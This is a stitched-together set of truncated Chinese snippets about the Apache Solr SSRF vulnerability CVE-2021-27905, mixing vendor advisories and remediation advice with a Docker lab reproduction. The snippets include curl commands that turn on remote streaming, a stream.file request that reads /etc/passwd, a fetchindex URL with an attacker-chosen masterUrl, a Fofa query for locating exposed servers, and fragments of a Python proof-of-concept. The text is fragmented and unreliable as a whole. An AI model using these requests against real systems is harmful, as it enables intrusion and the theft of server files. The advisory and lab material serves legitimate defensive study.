Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器,使用Java语言开发,主要基于http和Apache Lucene实现的,该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 0x01 漏洞概述 Apache Solr 8.8.2之前版本存在安全漏洞,Apache Solr 中的 ReplicationHandler(通常注册在 Solr core下的“...
影响范围:Apache Solr <= 8.8.2 限制:Solr 必须配置主从模式;受影响的是从(slave)服务器 环境复现 KALI:192.168.3.137 Docker 基础环境搭建 镜像下载 $ docker search vulfocus/solr-cve_2021_27905 NAME DESCRIPTION STARS OFFICIAL AUTOMATED vulfocus/solr-cve_2021_27905 0 $ docker pull vulfocus/solr-cve_...
indexInfo=false&wt=json,可以看到当前core名称 结合刚才得到的core名称访问http://192.168.43.244:3333/solr/new_core/config,得到以下页面 利用Config API打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关(使用curl)。 curl-d"{ "set-property" : {"requestDispatcher.requestParsers.enableRemote...
http://x.x.x.x:8983/solr/records/debug/dump?stream.file=/etc/passwd¶m=ContentStream 目标检索 Fofa: 代码语言:javascript 复制 app="APACHE-Solr" 安全建议 1、开启身份验证/授权,参考官方文档: https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html 2. 配置防火墙...
Referer: http://IP/solr/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close 4、POC复现: POC: 代码语言:javascript 复制 #CVE-2021-27905# Apache solr ssrfimportrequestsimporturllib3importjsonimportsys,getopt
Apache Solr存在服务端请求伪造漏洞。攻击者可以传递特定参数,使得服务端发起请求,成功利用该漏洞可造成内网信息探测。 受影响产品或系统 Apache Solr <8.8.2 解决方案 修复方案: 升级到Apache Solr最新版本8.8.2; 缓解方案: 1.限制请求协议,通常只允许http/https协议过滤返回信息,验证服务器对请求的响应。 2.对用户...
http://127.0.0.1:8983/solr/db/replication?command=fetchindex&masterUrl=http://xxx 紧急分析出PoC后又看了下这里的功能是在干嘛,solr 支持配置两个core,分别是主(master)和从(slave),我们可以主动控制让从(slave)去获取主的备份,而master的地址在配置文件可以配置,也允许请求者指定。
def commit(): url = '' try: opt, agrs = getopt.getopt(sys.argv[1:], 'hu:d:', ['help', 'url=','dnslog=']) for op, value in opt: if op == '-h' or op == '--help': print(''' [-] Apache Solr SSRF漏洞 (CVE-2021-27905)[-] Options: -h or --help : 方法说明 ...
4月13日,腾讯安全发布Apache Solr多个高危安全漏洞的风险通告,其中编号为CVE-2021-27905的服务器端请求伪造漏洞(SSRF)为高危严重级别,攻击者可以传递特定参数,使服务端发起请求,成功利用该漏洞可造成内网信息探测。 目前,CVE-2021-27905漏洞的POC(概念验证)代码已被公开到互联网上。这意味着漏洞利用方法已经公开,黑客...
Apache Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。2021年4月13日,监测到Apache Solr存在服务器端请求伪造漏洞,漏洞编号为CVE-2021-27905。 基本信息 漏洞情报编号:vulbox-intel-12980 ...